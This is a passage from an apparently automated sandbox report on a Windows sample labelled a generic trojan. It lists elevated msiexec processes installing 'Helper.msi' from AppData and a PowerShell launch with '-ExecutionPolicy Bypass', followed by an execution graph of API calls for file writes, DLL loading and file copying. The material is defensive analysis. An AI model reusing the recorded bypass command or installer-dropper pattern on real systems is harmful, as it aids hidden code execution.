                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                  Imagebase:0x7ff781c40000
                                                  File size:66'048 bytes
                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:2
                                                  Start time:19:50:48
                                                  Start date:21/08/2023
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E08B609454A113DDC10D91901CD8422B C
                                                  Imagebase:0x1270000
                                                  File size:59'904 bytes
                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:3
                                                  Start time:19:50:48
                                                  Start date:21/08/2023
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692672474 "
                                                  Imagebase:0x1270000
                                                  File size:59'904 bytes
                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:4
                                                  Start time:19:50:50
                                                  Start date:21/08/2023
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A46D6CE3215E9284ACEDBCBDAD509E67
                                                  Imagebase:0x1270000
                                                  File size:59'904 bytes
                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:6
                                                  Start time:19:50:51
                                                  Start date:21/08/2023
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                  Imagebase:0xf70000
                                                  File size:430'592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:7
                                                  Start time:19:50:51
                                                  Start date:21/08/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff766460000
                                                  File size:625'664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:4.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:19%
                                                    Total number of Nodes:1218
                                                    Total number of Limit Nodes:40
                                                    execution_graph 51273 454260 51274 4542ac 51273->51274 51277 4544c7 51273->51277 51300 3613c0 49 API calls std::_Throw_Cpp_error 51274->51300 51276 4542c0 51301 35ab90 51276->51301 51280 4542e0 51284 4542fb 51280->51284 51285 454309 51280->51285 51281 45454d 51383 35a850 51281->51383 51283 454557 51368 35a140 51284->51368 51285->51285 51382 35a6d0 26 API calls 3 library calls 51285->51382 51288 454307 51313 358810 51288->51313 51290 454339 CreateFileW 51291 454389 51290->51291 51292 45436b CloseHandle 51290->51292 51317 38d4d0 46 API calls 51291->51317 51292->51277 51294 454392 51318 454560 51294->51318 51296 4543a5 WriteFile 51297 4543d5 51296->51297 51298 45440d CloseHandle 51297->51298 51299 45441b 51297->51299 51298->51299 51299->51277 51300->51276 51302 35abc8 51301->51302 51311 35ac1c 51301->51311 51387 520372 EnterCriticalSection 51302->51387 51304 35abd2 51306 35abde GetProcessHeap 51304->51306 51304->51311 51305 520372 6 API calls 51308 35ac36 51305->51308 51307 35ac0b 51306->51307 51392 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51307->51392 51312 35aca7 51308->51312 51393 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51308->51393 51311->51305 51311->51312 51312->51280 51312->51281 51314 35883d 51313->51314 51315 35885e 51313->51315 51314->51290 51314->51313 51314->51315 51395 5252ff 51314->51395 51315->51290 51317->51294 51319 35ab90 12 API calls 51318->51319 51320 45459a 51319->51320 51321 4545a0 51320->51321 51322 45461e 51320->51322 51325 4545ce 51321->51325 51326 4545eb 51321->51326 51323 35a850 2 API calls 51322->51323 51324 454628 51323->51324 51402 46c960 51324->51402 51443 456300 46 API calls 51325->51443 51444 456300 46 API calls 51326->51444 51329 4545e6 51329->51296 51333 45468e 51334 4546a1 51333->51334 51335 4546f0 51333->51335 51445 454b90 52 API calls ___std_exception_destroy 51334->51445 51338 454710 GetModuleHandleW 51335->51338 51337 4546a9 51446 371a90 51337->51446 51340 454744 51338->51340 51341 45477c 51338->51341 51343 520372 6 API calls 51340->51343 51345 4547d4 51341->51345 51348 520372 6 API calls 51341->51348 51342 4546b6 MoveFileW 51347 46c960 5 API calls 51342->51347 51346 45474e 51343->51346 51353 520372 6 API calls 51345->51353 51365 45482c 51345->51365 51346->51341 51349 45475a GetProcAddress 51346->51349 51350 4546e8 51347->51350 51351 4547a6 51348->51351 51455 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51349->51455 51350->51335 51355 454a71 51350->51355 51351->51345 51356 4547b2 GetProcAddress 51351->51356 51357 4547fe 51353->51357 51354 454779 51354->51341 51458 52b6e4 11 API calls __set_se_translator 51355->51458 51456 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51356->51456 51360 45480a GetProcAddress 51357->51360 51357->51365 51457 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51360->51457 51361 454a7b 51363 4547d1 51363->51345 51367 454a05 51365->51367 51420 42a630 GetSystemDirectoryW 51365->51420 51366 454829 51366->51365 51367->51296 51369 35a150 51368->51369 51370 35a156 FindResourceW 51369->51370 51371 35a1d2 51369->51371 51370->51371 51372 35a16d 51370->51372 51371->51288 51645 35a000 LoadResource LockResource SizeofResource 51372->51645 51374 35a177 51374->51371 51375 35a19e 51374->51375 51646 35a660 26 API calls 51374->51646 51647 529907 24 API calls 2 library calls 51375->51647 51378 35a1ae 51379 35a1be 51378->51379 51380 35a850 2 API calls 51378->51380 51379->51288 51381 35a1e4 51380->51381 51382->51288 51384 35a85d 51383->51384 51385 521bfa std::_Throw_Cpp_error RaiseException 51384->51385 51386 35a86a RtlAllocateHeap 51385->51386 51386->51283 51388 520386 51387->51388 51389 52038b LeaveCriticalSection 51388->51389 51394 5203fa SleepConditionVariableCS LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 51388->51394 51389->51304 51392->51311 51393->51312 51394->51388 51400 52523b 24 API calls __cftof 51395->51400 51397 52530e 51401 52531c 6 API calls __set_se_translator 51397->51401 51399 52531b 51400->51397 51401->51399 51459 46c9a0 51402->51459 51404 454680 51405 35a380 51404->51405 51406 35a38b 51405->51406 51407 35a39a 51406->51407 51408 35a43a 51406->51408 51412 35a3b7 __set_se_translator 51406->51412 51407->51333 51472 35a610 26 API calls 51408->51472 51410 35a3de __Wcscoll 51470 5252ef 24 API calls __cftof 51410->51470 51411 35a43f 51413 35a380 26 API calls 51411->51413 51412->51410 51414 35a3fd 51412->51414 51418 35a41f __Wcscoll 51412->51418 51415 35a476 51413->51415 51414->51333 51415->51333 51417 35a3ee 51417->51333 51418->51414 51471 5252ef 24 API calls __cftof 51418->51471 51421 42a67f 51420->51421 51423 42a73b 51420->51423 51422 35ab90 12 API calls 51421->51422 51421->51423 51424 42a68f 51422->51424 51423->51365 51425 42a793 51424->51425 51426 42a699 51424->51426 51427 35a850 2 API calls 51425->51427 51430 42a6c3 51426->51430 51431 42a6b5 51426->51431 51428 42a79d 51427->51428 51555 51fea9 51428->51555 51554 35a6d0 26 API calls 3 library calls 51430->51554 51433 35a140 30 API calls 51431->51433 51435 42a6c1 51433->51435 51473 3711b0 51435->51473 51436 42a93a 51436->51365 51439 42a702 51440 3711b0 96 API calls 51439->51440 51441 42a729 51440->51441 51441->51423 51442 42a73f LoadLibraryExW 51441->51442 51442->51423 51443->51329 51444->51329 51445->51337 51447 371aa6 51446->51447 51448 371af3 51446->51448 51449 371ae0 51447->51449 51450 371ab6 51447->51450 51448->51342 51644 35a6d0 26 API calls 3 library calls 51449->51644 51452 35a380 26 API calls 51450->51452 51454 371abc 51452->51454 51453 371aeb 51453->51342 51454->51342 51455->51354 51456->51363 51457->51366 51458->51361 51461 46c9dc 51459->51461 51462 46c9e4 51459->51462 51460 46cad1 51463 35a850 2 API calls 51460->51463 51461->51404 51462->51460 51462->51461 51465 46ca14 __set_se_translator 51462->51465 51464 46cadb 51463->51464 51465->51461 51466 46ca32 FindFirstFileW 51465->51466 51467 46ca61 51466->51467 51468 46ca7e GetLastError 51466->51468 51467->51461 51469 46ca9b FindClose 51467->51469 51468->51467 51469->51461 51470->51417 51471->51414 51472->51411 51475 3711d6 51473->51475 51482 371241 51473->51482 51474 35a850 2 API calls 51476 37128c 51474->51476 51475->51482 51483 371220 __Wcscoll __set_se_translator 51475->51483 51563 35a660 26 API calls 51475->51563 51477 3712fb 51476->51477 51479 3712ee FindClose 51476->51479 51565 35a4a0 RtlAllocateHeap RaiseException 51477->51565 51479->51477 51481 37126f 51481->51439 51482->51474 51482->51481 51483->51482 51564 5252ef 24 API calls __cftof 51483->51564 51484 371317 51485 35ab90 12 API calls 51484->51485 51490 371329 51485->51490 51487 3716dc 51488 35a850 2 API calls 51487->51488 51489 3716e6 51488->51489 51491 35a380 26 API calls 51489->51491 51490->51487 51492 371351 51490->51492 51493 37135f 51490->51493 51496 37172f 51491->51496 51494 35a140 30 API calls 51492->51494 51566 35a6d0 26 API calls 3 library calls 51493->51566 51498 37135d 51494->51498 51497 37192c 51496->51497 51499 371950 51496->51499 51501 371765 51496->51501 51497->51439 51500 3715cc 51498->51500 51503 3713a6 PathIsUNCW 51498->51503 51504 3714f5 FindFirstFileW 51498->51504 51502 35a850 2 API calls 51499->51502 51500->51439 51506 371782 51501->51506 51624 371bb0 26 API calls 51501->51624 51507 37195a 51502->51507 51508 371485 51503->51508 51509 3713bb 51503->51509 51504->51500 51505 37150d GetFullPathNameW 51504->51505 51511 371526 51505->51511 51553 371661 51505->51553 51625 371b00 38 API calls 51506->51625 51617 364a70 38 API calls 3 library calls 51508->51617 51567 364a70 38 API calls 3 library calls 51509->51567 51514 371541 GetFullPathNameW 51511->51514 51619 35a660 26 API calls 51511->51619 51520 37155a 51514->51520 51516 37178d 51519 3711b0 88 API calls 51516->51519 51517 35a850 2 API calls 51517->51487 51521 3717a1 51519->51521 51523 371606 51520->51523 51534 37158e 51520->51534 51520->51553 51521->51497 51524 3717d4 PathIsUNCW 51521->51524 51522 3713c3 51522->51504 51568 364e60 51522->51568 51537 371618 _wcsrchr 51523->51537 51620 35a550 26 API calls 3 library calls 51523->51620 51525 3718b7 51524->51525 51526 3717e8 51524->51526 51627 364a70 38 API calls 3 library calls 51525->51627 51626 364a70 38 API calls 3 library calls 51526->51626 51531 37143e 51536 371a90 26 API calls 51531->51536 51533 3715c4 SetLastError 51533->51500 51534->51533 51535 3715b7 FindClose 51534->51535 51535->51533 51539 371451 51536->51539 51538 371638 _wcsrchr 51537->51538 51621 35a550 26 API calls 3 library calls 51537->51621 51542 371665 51538->51542 51543 37164b 51538->51543 51539->51504 51541 371476 51539->51541 51618 371960 26 API calls 2 library calls 51541->51618 51542->51553 51623 35a550 26 API calls 3 library calls 51542->51623 51544 3716b3 51543->51544 51543->51553 51622 35a550 26 API calls 3 library calls 51543->51622 51544->51500 51545 3717f0 51545->51497 51546 364e60 84 API calls 51545->51546 51550 371871 51546->51550 51551 371a90 26 API calls 51550->51551 51552 371883 51551->51552 51552->51497 51628 371960 26 API calls 2 library calls 51552->51628 51553->51517 51553->51544 51554->51435 51557 51feae 51555->51557 51556 42a8f2 51562 36e010 25 API calls std::_Throw_Cpp_error 51556->51562 51557->51556 51559 51feca 51557->51559 51640 5354d3 EnterCriticalSection LeaveCriticalSection 51557->51640 51641 521bfa 51559->51641 51561 520d10 51562->51436 51563->51483 51564->51482 51565->51484 51566->51498 51567->51522 51569 364eb7 51568->51569 51570 364ff0 51568->51570 51573 364f09 51569->51573 51575 364ed9 51569->51575 51571 35a850 2 API calls 51570->51571 51572 364ffa 51571->51572 51630 35a610 26 API calls 51572->51630 51577 35ab90 12 API calls 51573->51577 51585 364f1b 51573->51585 51578 35a380 26 API calls 51575->51578 51576 364fff 51579 35a850 2 API calls 51576->51579 51577->51585 51580 364ee1 51578->51580 51581 365009 51579->51581 51580->51531 51582 35a850 2 API calls 51581->51582 51583 365013 51582->51583 51584 36505a 51583->51584 51595 3650dd 51583->51595 51586 365061 51584->51586 51587 3650bf GetWindowLongW 51584->51587 51585->51572 51585->51576 51585->51581 51589 364f43 51585->51589 51590 3652a7 NtdllDefWindowProc_W 51586->51590 51592 365082 GetWindowLongW 51586->51592 51588 3650cc 51587->51588 51588->51590 51589->51581 51598 364f83 __Wcscoll __set_se_translator 51589->51598 51591 3652f6 51590->51591 51591->51531 51592->51590 51593 365098 GetWindowLongW SetWindowLongW NtdllDefWindowProc_W 51592->51593 51593->51591 51594 364f9f 51594->51531 51596 3652c9 51595->51596 51597 36515b SetWindowTextW 51595->51597 51596->51591 51601 529d16 ___std_exception_destroy 2 API calls 51596->51601 51599 365177 51597->51599 51600 36517d 51597->51600 51598->51594 51629 5252ef 24 API calls __cftof 51598->51629 51599->51600 51603 36520b 51600->51603 51604 365193 GlobalAlloc 51600->51604 51601->51591 51603->51596 51632 365580 61 API calls 4 library calls 51603->51632 51604->51603 51605 3651a3 GlobalLock 51604->51605 51609 3651b8 __Wcscoll __set_se_translator 51605->51609 51607 36523e 51608 3652b7 51607->51608 51612 365257 SetWindowLongW 51607->51612 51608->51596 51611 3651bd 51609->51611 51631 5252ef 24 API calls __cftof 51609->51631 51614 3651f1 GlobalUnlock 51611->51614 51613 36526b 51612->51613 51615 36529a 51613->51615 51633 529d16 51613->51633 51614->51603 51615->51588 51617->51539 51618->51504 51619->51514 51620->51537 51621->51538 51622->51553 51623->51553 51624->51506 51625->51516 51626->51545 51627->51552 51628->51497 51629->51594 51630->51576 51631->51611 51632->51607 51636 53820d 51633->51636 51635 529d2e 51635->51615 51637 538218 RtlFreeHeap 51636->51637 51639 53823a __dosmaperr __Wcscoll 51636->51639 51638 53822d GetLastError 51637->51638 51637->51639 51638->51639 51639->51635 51640->51557 51642 521c41 RaiseException 51641->51642 51643 521c14 51641->51643 51642->51561 51643->51642 51644->51453 51645->51374 51646->51375 51647->51378 51648 46b960 51686 46a0b0 25 API calls 51648->51686 51650 46b99f 51687 3815f0 25 API calls 51650->51687 51652 46b9b7 51653 358810 24 API calls 51652->51653 51654 46b9df 51653->51654 51655 46ba19 __set_se_translator 51654->51655 51657 46bc48 51654->51657 51665 46ba73 51655->51665 51714 3689f0 24 API calls 51655->51714 51656 46bac9 51688 474b10 51656->51688 51659 5252ff std::_Throw_Cpp_error 24 API calls 51657->51659 51658 46baaf 51715 4762f0 57 API calls 3 library calls 51658->51715 51662 46bc4d 51659->51662 51667 5252ff std::_Throw_Cpp_error 24 API calls 51662->51667 51663 46bada 51716 358190 51663->51716 51665->51656 51665->51658 51670 46bc52 51667->51670 51668 46bb11 51726 46a0b0 25 API calls 51668->51726 51669 46bac6 51669->51656 51672 358190 25 API calls 51670->51672 51674 46bcb9 51672->51674 51673 46bb25 51727 4729a0 43 API calls 3 library calls 51673->51727 51728 521ad5 51674->51728 51677 46bccc 51741 4762f0 57 API calls 3 library calls 51677->51741 51679 46bcdb 51680 46bbdf 51681 358810 24 API calls 51680->51681 51683 46bc15 51681->51683 51682 46bb45 51682->51662 51682->51680 51684 358810 24 API calls 51683->51684 51685 46bc27 51684->51685 51686->51650 51687->51652 51742 358700 51688->51742 51690 474bb9 __set_se_translator 51691 474bea LoadStringW 51690->51691 51692 474c19 51691->51692 51697 474c43 __set_se_translator 51691->51697 51693 358190 25 API calls 51692->51693 51694 474c3a 51693->51694 51699 474ce5 51694->51699 51701 358810 24 API calls 51694->51701 51695 474c98 LoadStringW 51696 474caf 51695->51696 51695->51697 51698 358190 25 API calls 51696->51698 51697->51695 51757 474e80 26 API calls __set_se_translator 51697->51757 51698->51694 51702 474d87 51699->51702 51703 5252ff std::_Throw_Cpp_error 24 API calls 51699->51703 51701->51699 51702->51663 51704 474dcb 51703->51704 51705 474e6e 51704->51705 51706 474e51 SysAllocStringLen 51704->51706 51707 474e09 SysFreeString 51704->51707 51708 35a850 2 API calls 51705->51708 51706->51707 51709 474e64 51706->51709 51713 474e4d 51707->51713 51710 474e78 51708->51710 51711 35a850 2 API calls 51709->51711 51711->51705 51713->51663 51714->51665 51715->51669 51717 358217 51716->51717 51720 3581a0 51716->51720 51759 358760 RaiseException 51717->51759 51718 3581ac 51718->51668 51720->51718 51722 358700 25 API calls 51720->51722 51725 3581ee 51722->51725 51725->51668 51726->51673 51727->51682 51760 521ae3 51728->51760 51730 521ada 51730->51677 51774 53950e EnterCriticalSection LeaveCriticalSection __set_se_translator 51730->51774 51732 529990 51733 52999b 51732->51733 51775 539553 24 API calls 3 library calls 51732->51775 51735 5299c4 51733->51735 51736 5299a5 IsProcessorFeaturePresent 51733->51736 51777 52b6a8 11 API calls __set_se_translator 51735->51777 51737 5299b1 51736->51737 51776 5250f3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __set_se_translator 51737->51776 51740 5299ce 51741->51679 51743 35874b 51742->51743 51744 35870b 51742->51744 51758 3586e0 25 API calls std::_Throw_Cpp_error 51743->51758 51745 358714 51744->51745 51746 358736 51744->51746 51745->51743 51748 35871b 51745->51748 51749 358746 51746->51749 51751 51fea9 3 API calls 51746->51751 51750 51fea9 3 API calls 51748->51750 51749->51690 51754 358721 51750->51754 51755 358740 51751->51755 51752 5252ff std::_Throw_Cpp_error 24 API calls 51753 358755 51752->51753 51754->51752 51756 35872a 51754->51756 51755->51690 51756->51690 51757->51697 51758->51754 51761 521aef GetLastError 51760->51761 51762 521aec 51760->51762 51778 524ccd 6 API calls ___vcrt_FlsGetValue 51761->51778 51762->51730 51764 521b04 51765 521b23 51764->51765 51766 521b69 SetLastError 51764->51766 51779 524d08 6 API calls ___vcrt_FlsGetValue 51764->51779 51765->51766 51766->51730 51768 521b1d 51768->51765 51769 521b45 51768->51769 51780 524d08 6 API calls ___vcrt_FlsGetValue 51768->51780 51772 521b59 51769->51772 51781 524d08 6 API calls ___vcrt_FlsGetValue 51769->51781 51773 529d16 ___std_exception_destroy 2 API calls 51772->51773 51773->51765 51774->51732 51775->51733 51776->51735 51777->51740 51778->51764 51779->51768 51780->51769 51781->51772 51782 476f60 51791 476b40 51782->51791 51784 476fa1 GetFileVersionInfoSizeW 51785 47701e GetLastError 51784->51785 51786 476fba 51784->51786 51787 476fca 51785->51787 51786->51787 51789 476fd1 GetFileVersionInfoW 51786->51789 51788 477030 DeleteFileW 51787->51788 51790 477037 51787->51790 51788->51790 51789->51785 51789->51787 51792 476b7e 51791->51792 51793 476b86 SHGetFolderPathW 51792->51793 51794 476d79 51792->51794 51795 476ba4 51793->51795 51794->51784 51795->51794 51795->51795 51808 360ec0 51795->51808 51797 476c12 __set_se_translator 51842 45eab0 51797->51842 51799 476c41 GetTempFileNameW 51801 358810 24 API calls 51799->51801 51803 476c71 51801->51803 51802 476ce3 Wow64DisableWow64FsRedirection CopyFileW 51804 476d32 51802->51804 51803->51802 51803->51803 51805 476d67 51804->51805 51806 476d47 Wow64RevertWow64FsRedirection 51804->51806 51807 358810 24 API calls 51805->51807 51806->51805 51807->51794 51809 360f2e 51808->51809 51810 360f66 51808->51810 51811 520372 6 API calls 51809->51811 51813 360fcd 51810->51813 51815 520372 6 API calls 51810->51815 51830 361097 51810->51830 51818 360f38 51811->51818 51816 360fe6 GetTempPathW 51813->51816 51819 360fd6 51813->51819 51814 3610ca 51814->51797 51817 360f8d 51815->51817 51816->51819 51817->51813 51820 360f99 GetModuleHandleW GetProcAddress 51817->51820 51818->51810 51862 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51818->51862 51824 358190 25 API calls 51819->51824 51819->51830 51863 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 51820->51863 51823 360fca 51823->51813 51825 361049 51824->51825 51864 45ecc0 27 API calls 51825->51864 51827 361061 51828 3610fb 51827->51828 51827->51830 51829 5252ff std::_Throw_Cpp_error 24 API calls 51828->51829 51831 361100 51829->51831 51865 357690 51830->51865 51832 360ec0 46 API calls 51831->51832 51833 361154 51832->51833 51834 357690 25 API calls 51833->51834 51835 36116b 51834->51835 51836 358810 24 API calls 51835->51836 51837 36118c 51836->51837 51876 3611e0 49 API calls std::_Throw_Cpp_error 51837->51876 51839 36119b 51840 358810 24 API calls 51839->51840 51841 3611b3 51840->51841 51841->51797 51843 45eb06 51842->51843 51846 45eb13 51842->51846 51844 357690 25 API calls 51843->51844 51845 45eb0e 51844->51845 51845->51799 51847 45ec83 51846->51847 51849 45eb50 PathIsUNCW 51846->51849 51848 357690 25 API calls 51847->51848 51848->51845 51850 45eb65 51849->51850 51851 45ec3b 51849->51851 51878 4609b0 26 API calls ___vcrt_FlsGetValue 51850->51878 51880 4609b0 26 API calls ___vcrt_FlsGetValue 51851->51880 51854 45eb8a 51854->51847 51857 45eb95 51854->51857 51855 45ec60 51855->51847 51856 45ec67 51855->51856 51858 357690 25 API calls 51856->51858 51859 357690 25 API calls 51857->51859 51860 45eb9e 51858->51860 51859->51860 51879 359ac0 25 API calls 51860->51879 51862->51810 51863->51823 51864->51827 51866 3576b6 51865->51866 51867 35772f 51866->51867 51869 3576c1 51866->51869 51877 358760 RaiseException 51867->51877 51870 3576cd 51869->51870 51873 358700 25 API calls 51869->51873 51870->51814 51874 35770c 51873->51874 51874->51814 51876->51839 51878->51854 51879->51845 51880->51855 51881 372b50 51884 47c810 51881->51884 51883 372b64 51885 47c846 51884->51885 51886 47c85a 51884->51886 51885->51883 51887 35ab90 12 API calls 51886->51887 51892 47c85f 51887->51892 51888 47ca3a 51889 35a850 2 API calls 51888->51889 51890 47ca44 51889->51890 51892->51888 51894 35a140 30 API calls 51892->51894 51896 47c91f GetActiveWindow 51892->51896 51898 47c9fe 51892->51898 51900 35ab90 12 API calls 51892->51900 51901 47ca50 43 API calls 51892->51901 51902 35a6d0 26 API calls 3 library calls 51892->51902 51903 413270 LoadStringW LoadStringW 51892->51903 51904 49e1f0 51892->51904 51908 35a6d0 26 API calls 3 library calls 51892->51908 51894->51892 51896->51892 51898->51883 51900->51892 51901->51892 51902->51892 51903->51892 51906 49e30f 51904->51906 51907 49e215 51904->51907 51905 49e2b1 GetDiskFreeSpaceExW 51905->51906 51905->51907 51906->51892 51907->51905 51907->51906 51908->51896 51909 47a7e0 51910 47a815 51909->51910 51918 47a8d9 51909->51918 51911 47a8c1 51910->51911 51925 4814b0 51910->51925 51947 47bb50 109 API calls 51911->51947 51914 47a8ca 51916 371a90 26 API calls 51914->51916 51915 47a82d 51917 371a90 26 API calls 51915->51917 51916->51918 51919 47a83f 51917->51919 51920 371a90 26 API calls 51919->51920 51921 47a87c 51920->51921 51921->51911 51921->51918 51922 47a915 51921->51922 51923 35a850 2 API calls 51922->51923 51924 47a91f 51923->51924 51926 35ab90 12 API calls 51925->51926 51936 4814ec 51926->51936 51927 48193f 51928 35a850 2 API calls 51927->51928 51929 481949 51928->51929 51930 35a850 2 API calls 51929->51930 51932 481953 51930->51932 51931 48154e 52035 364bd0 51931->52035 51934 4818d5 51934->51915 51935 364e60 84 API calls 51935->51936 51936->51927 51936->51929 51936->51931 51936->51935 51937 35ab90 12 API calls 51936->51937 51939 35a380 26 API calls 51936->51939 51942 371a90 26 API calls 51936->51942 51945 35a6d0 26 API calls 51936->51945 51946 3711b0 96 API calls 51936->51946 51948 481960 51936->51948 52052 44e930 51936->52052 52075 371bb0 26 API calls 51936->52075 52076 46d5c0 28 API calls 51936->52076 52077 49f180 94 API calls _wcsrchr 51936->52077 51937->51936 51939->51936 51942->51936 51945->51936 51946->51936 51947->51914 51950 4819a1 51948->51950 51949 481a8a 51951 35ab90 12 API calls 51949->51951 51950->51949 51952 35a380 26 API calls 51950->51952 51953 481aba 51951->51953 51954 4819df 51952->51954 51961 481aeb 51953->51961 51962 481af6 51953->51962 52031 4821d5 51953->52031 52083 46d5c0 28 API calls 51954->52083 51956 35a850 2 API calls 51958 4821fa 51956->51958 51957 4819ff 51957->51949 51959 481a07 51957->51959 51960 35a850 2 API calls 51958->51960 51963 371a90 26 API calls 51959->51963 51965 482204 51960->51965 51966 35a140 30 API calls 51961->51966 52085 35a6d0 26 API calls 3 library calls 51962->52085 51964 481a1b 51963->51964 51964->51958 51972 481a37 51964->51972 51974 481a47 51964->51974 52094 520658 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 51965->52094 51969 481af4 51966->51969 52078 3649d0 51969->52078 51970 482209 51972->51974 52084 371bb0 26 API calls 51972->52084 51974->51936 51975 481bbe 51979 35ab90 12 API calls 51975->51979 51976 481b4a SHGetFolderPathW 51978 481b74 51976->51978 51978->51978 52086 35a6d0 26 API calls 3 library calls 51978->52086 51980 481bce 51979->51980 51982 481c0a 51980->51982 51983 481bff 51980->51983 51980->52031 52088 35a6d0 26 API calls 3 library calls 51982->52088 51984 35a140 30 API calls 51983->51984 51986 481c08 51984->51986 51988 3649d0 2 API calls 51986->51988 51987 481b92 51987->51958 51987->51975 52087 371bb0 26 API calls 51987->52087 51990 481c2a 51988->51990 51991 481c54 GetSystemDirectoryW 51990->51991 51993 481c85 51990->51993 51991->51965 51991->51993 51992 35ab90 12 API calls 51992->51993 51993->51992 51994 35a6d0 26 API calls 51993->51994 51995 35a140 30 API calls 51993->51995 51996 3649d0 2 API calls 51993->51996 51997 481db0 51993->51997 51998 481d54 GetWindowsDirectoryW 51993->51998 51993->52031 51994->51993 51995->51993 51996->51993 51999 35ab90 12 API calls 51997->51999 51998->51965 51998->51993 52000 481db5 51999->52000 52001 481df1 52000->52001 52002 481de6 52000->52002 52000->52031 52089 35a6d0 26 API calls 3 library calls 52001->52089 52003 35a140 30 API calls 52002->52003 52005 481def 52003->52005 52006 3649d0 2 API calls 52005->52006 52007 481e11 52006->52007 52008 481e39 GetWindowsDirectoryW 52007->52008 52009 481e60 52007->52009 52008->52009 52010 360ec0 49 API calls 52009->52010 52012 481f29 52009->52012 52011 481ebe 52010->52011 52013 45eab0 28 API calls 52011->52013 52014 481f7e GetModuleFileNameW 52012->52014 52015 481ff6 52012->52015 52028 482002 52012->52028 52017 481ed3 52013->52017 52020 481f97 52014->52020 52016 371a90 26 API calls 52015->52016 52016->52028 52090 35a6d0 26 API calls 3 library calls 52017->52090 52019 481f08 52021 358810 24 API calls 52019->52021 52020->51965 52091 35a6d0 26 API calls 3 library calls 52020->52091 52023 481f17 52021->52023 52025 358810 24 API calls 52023->52025 52024 482062 SHGetSpecialFolderLocation 52026 48218f SHGetPathFromIDListW SHGetMalloc 52024->52026 52024->52028 52025->52012 52026->52028 52027 520372 6 API calls 52027->52028 52028->52024 52028->52026 52028->52027 52029 4820f7 LoadLibraryW 52028->52029 52028->52031 52092 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52028->52092 52093 482210 76 API calls 52028->52093 52030 48210e 52029->52030 52030->52028 52032 482128 GetProcAddress 52030->52032 52031->51956 52032->52028 52036 364c46 52035->52036 52037 364c15 52035->52037 52039 35ab90 12 API calls 52036->52039 52048 364c57 52036->52048 52038 35a380 26 API calls 52037->52038 52040 364c1a 52038->52040 52039->52048 52040->51934 52041 364d31 52042 35a850 2 API calls 52041->52042 52045 364d3b 52042->52045 52043 364d22 52044 35a850 2 API calls 52043->52044 52046 364d2c 52044->52046 52096 35a610 26 API calls 52046->52096 52048->52041 52048->52043 52048->52046 52050 364cb5 __Wcscoll __set_se_translator 52048->52050 52049 364cd1 52049->51934 52050->52049 52095 5252ef 24 API calls __cftof 52050->52095 52053 35ab90 12 API calls 52052->52053 52059 44e96e 52053->52059 52054 